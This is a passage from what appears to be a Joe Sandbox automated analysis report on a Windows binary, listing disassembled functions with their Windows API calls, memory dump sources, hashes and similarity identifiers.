                                                                                                                                                          • Instruction ID: 201a56c8dcb74d3312d6275c32d80f8ba94e2a8376a63c3c6208d54dfd2ed429
                                                                                                                                                          • Opcode Fuzzy Hash: abf633eda87f5c5333276b9237a49600086451751ce93b08044b869ba94c2540
                                                                                                                                                          • Instruction Fuzzy Hash: AAF08170900119BADB10AB52CD0BECFBE69DF45358F104077F904B50A2E2789B40D6A9
                                                                                                                                                          Function 0047656C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00476553
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID: PAbn$b
                                                                                                                                                          • API String ID: 1269201914-1508761821
                                                                                                                                                          • Opcode ID: 190d05f9941c82c4bf93ba8b4716d9cf1710172f7c85c6380006b52710966e06
                                                                                                                                                          • Instruction ID: 0c9dc849aec97c9d68a7300d31f44d07c0dca46addefbe3cbecb98dfa97d1207
                                                                                                                                                          • Opcode Fuzzy Hash: 190d05f9941c82c4bf93ba8b4716d9cf1710172f7c85c6380006b52710966e06
                                                                                                                                                          • Instruction Fuzzy Hash: D2B0129139D4017C3104A54BAC0BF77014CD5C0B11330C46FF449C00C4D5AC1C0120BF
                                                                                                                                                          Function 00459A74 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00459B7E,?,00459A6E,00000000,?,?,00459B7E,83C6D434,?,00459B7E), ref: 00459A85
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00459A6E,00000000,?,?,00459B7E,83C6D434,?,00459B7E), ref: 00459A8C
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00459A9E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                          • Opcode ID: 96780c8f12227157a397e913b63b9aecaaeaf510d5277b68238e2567fa90d69e
                                                                                                                                                          • Instruction ID: 249a0697a702f3c8123cbc47c241fca6346adbe6fb53342c8db07f24f35b5e25
                                                                                                                                                          • Opcode Fuzzy Hash: 96780c8f12227157a397e913b63b9aecaaeaf510d5277b68238e2567fa90d69e
                                                                                                                                                          • Instruction Fuzzy Hash: B9D06731004244ABCF016F61DD099593F26EA443567948025BD0D46222DB399D95DB98
                                                                                                                                                          Function 0047655C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00476553
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID: PAbn
                                                                                                                                                          • API String ID: 1269201914-1724936755
                                                                                                                                                          • Opcode ID: 3a0db4904d6e7edf5fce4306bed952b1c6eb18ed4e1d84f575337f8b86f882df
                                                                                                                                                          • Instruction ID: 40e69d3651a5489e9974cd721f0487eff1e3fb1deeea2aa36ae1448399262d31
                                                                                                                                                          • Opcode Fuzzy Hash: 3a0db4904d6e7edf5fce4306bed952b1c6eb18ed4e1d84f575337f8b86f882df
                                                                                                                                                          • Instruction Fuzzy Hash: E5B0129139D001BC3104E25BAC0BD77065CC5C0B15330C06FF809C4084D59C5C4110BF
                                                                                                                                                          Function 0047653B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00476553
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID: PAbn
                                                                                                                                                          • API String ID: 1269201914-1724936755
                                                                                                                                                          • Opcode ID: 40adcf177309754a0db56859277a54aa3da13fae2327479306f094237ae4c5ba
                                                                                                                                                          • Instruction ID: 8931a35f0c929efe153df1cb93ed650b88fc7fdcb14951ac5c2c7ff99fc9437f
                                                                                                                                                          • Opcode Fuzzy Hash: 40adcf177309754a0db56859277a54aa3da13fae2327479306f094237ae4c5ba
                                                                                                                                                          • Instruction Fuzzy Hash: 75B012913DD4017C31046547ED0BD77051CC6C0B11330C46FF505D0084959D1D0220BF
                                                                                                                                                          Function 004663A6 Relevance: 2.5, APIs: 2, Instructions: 17COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(004B2588,00000000,00000000,?,00465957,?,?,?,00000000,0000FDE9,?,004092BB,00000003), ref: 004663B1
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(004B2588,?,?,00465957,?,?,?,00000000,0000FDE9,?,004092BB,00000003), ref: 004663C2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                          • Opcode ID: ff3709a068d38649a431524fc6aa60f1ea44d99d282cb4a19f7c3145fadd2140
                                                                                                                                                          • Instruction ID: 8b45a3b825b823f7d97fab816ebb8928825ecf6564b6da56a278c3089ee668a5
                                                                                                                                                          • Opcode Fuzzy Hash: ff3709a068d38649a431524fc6aa60f1ea44d99d282cb4a19f7c3145fadd2140
                                                                                                                                                          • Instruction Fuzzy Hash: D6D0C9326041587786113BBAEC088DAFAACDEA2AB27418537F609D212096E5895196A9
                                                                                                                                                          Function 00467237 Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,004680A5,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,00467DA4,00000000), ref: 004672A7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3660427363-0
                                                                                                                                                          • Opcode ID: 0faa95cedd2eb23138784b942ac3e0235222f9b5606accee816a1fa6fceaac9f
                                                                                                                                                          • Instruction ID: e5df0cd4d58953838b4ac939886ce18eb87fb029d75ad03d6fcd903786f125ae
                                                                                                                                                          • Opcode Fuzzy Hash: 0faa95cedd2eb23138784b942ac3e0235222f9b5606accee816a1fa6fceaac9f
                                                                                                                                                          • Instruction Fuzzy Hash: 8221D031A0411AEBCB168E55CC40A6F3BB6EF95308F248067FD009B364EB359D41EB99
                                                                                                                                                          Function 004517A7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00451EEA: GetModuleHandleW.KERNEL32(00000000,00459A0F,83C6D434,?,00459B7E), ref: 00451EEC
                                                                                                                                                          • ___security_init_cookie.LIBCMT ref: 004517F0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule___security_init_cookie
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1525027140-0
                                                                                                                                                          • Opcode ID: a52ad42482922efb022202dfef1e7e344a30ec78b24063b19f500984ecd86704
                                                                                                                                                          • Instruction ID: 04f709bc6beec7d2eb2e706d752e54841e45826914cccabae4c9a1108ede7636
                                                                                                                                                          • Opcode Fuzzy Hash: a52ad42482922efb022202dfef1e7e344a30ec78b24063b19f500984ecd86704
                                                                                                                                                          • Instruction Fuzzy Hash: 9AE0923590425D8BDF25ABD8D80239DB7B1FB4431AF10061BDD11272A3D73928088649
                                                                                                                                                          Function 0040252B Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00000000,?,004010DF,?,00000000), ref: 00402534
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: 8d5f9bf9b08cc64b01703d13fadbf2ec1ff359da061b082fd4a6cc2793a2e680
                                                                                                                                                          • Instruction ID: 4f2dd1873488938774489ed6f9a8fcc7e7d9aee893ab071e22de98ac8e10368d
                                                                                                                                                          • Opcode Fuzzy Hash: 8d5f9bf9b08cc64b01703d13fadbf2ec1ff359da061b082fd4a6cc2793a2e680
                                                                                                                                                          • Instruction Fuzzy Hash: 35D02B312025342787285E6D8D18467FB09DF017753414236FC28DA2F0C370CC1187CC
                                                                                                                                                          Function 0046AB77 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,0040983B,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046AB84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                          • Opcode ID: 267c98abdcfb78fdafe85d9306430068ec91ea3efbc0b5c20a70a9b6978e3845
                                                                                                                                                          • Instruction ID: 1f941cca7e51e81036832e58fdbb59f52590dffbc433d5694740a58b02c27a15
                                                                                                                                                          • Opcode Fuzzy Hash: 267c98abdcfb78fdafe85d9306430068ec91ea3efbc0b5c20a70a9b6978e3845
                                                                                                                                                          • Instruction Fuzzy Hash: 27F0D1B19217669B87259F5DBF58942BBA8F708B40311577FB510D2230CBF44482CF9D
                                                                                                                                                          Function 00407B90 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00407C39: RtlAcquireSRWLockExclusive.NTDLL ref: 00407C56
                                                                                                                                                          • DloadProtectSection.DELAYIMP ref: 00407BB8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3680172570-0
                                                                                                                                                          • Opcode ID: faadd11f11cbc129242d15e3f55f7947adeec5a36324dda74546e534ad45a7ec
                                                                                                                                                          • Instruction ID: 9698d9982d26fc5fd2e4825b6435c1b4e36dbe47f7bd9b05652561742b9baade
                                                                                                                                                          • Opcode Fuzzy Hash: faadd11f11cbc129242d15e3f55f7947adeec5a36324dda74546e534ad45a7ec
                                                                                                                                                          • Instruction Fuzzy Hash: 48D0A930E092008AC721EB22A882B9532A0B709308F80403BE401B12E0C3BC38629A9F
                                                                                                                                                          Function 004766E6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 004766F8
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                          • Opcode ID: e2e9d0148de2610456c800ecfaba5b5d059fd6853d020268da4b7deebbce49fb
                                                                                                                                                          • Instruction ID: aeb3e6a03c7a7790b00349ff28394651d07e88dc4207b19bc294cae84b7ec278
                                                                                                                                                          • Opcode Fuzzy Hash: e2e9d0148de2610456c800ecfaba5b5d059fd6853d020268da4b7deebbce49fb
                                                                                                                                                          • Instruction Fuzzy Hash: A7B012912DD402BC3204B9079C06EB7010CC8C0B12370C03FF404D0080DACCAC01207F
                                                                                                                                                          Function 0047671C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0047672E
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                          • Opcode ID: 3c2d7f7709cce27d56cb3e75378fc5d9fa1f8fdc02c58deaea498d4c8f39943e
                                                                                                                                                          • Instruction ID: 4b00725133ca3e92fdd35c065b92364e9bfbdd7f6d7adeb883252d2052db9231
                                                                                                                                                          • Opcode Fuzzy Hash: 3c2d7f7709cce27d56cb3e75378fc5d9fa1f8fdc02c58deaea498d4c8f39943e
                                                                                                                                                          • Instruction Fuzzy Hash: 9FB0128169D001BD3108E517DE06C77015CC4C0B95330C02FF404E0084D68C5C01007F
                                                                                                                                                          Function 00407B4F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00407B67
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                          • Opcode ID: 0e839ad4fe8865f503401d2c4d2d088dbed98b0b42f3d77ea26513c3b7de1d8f
                                                                                                                                                          • Instruction ID: 0bd0b0f503b42012d4d5629cc0e4acee69ab21c5409ad98a874aafe0d26acaa2
                                                                                                                                                          • Opcode Fuzzy Hash: 0e839ad4fe8865f503401d2c4d2d088dbed98b0b42f3d77ea26513c3b7de1d8f
                                                                                                                                                          • Instruction Fuzzy Hash: 30B09281A9E0016C6204660A9906D37525CC580B55330C02BB200A808695A83C02007B
                                                                                                                                                          Function 00407B70 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00407B67
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
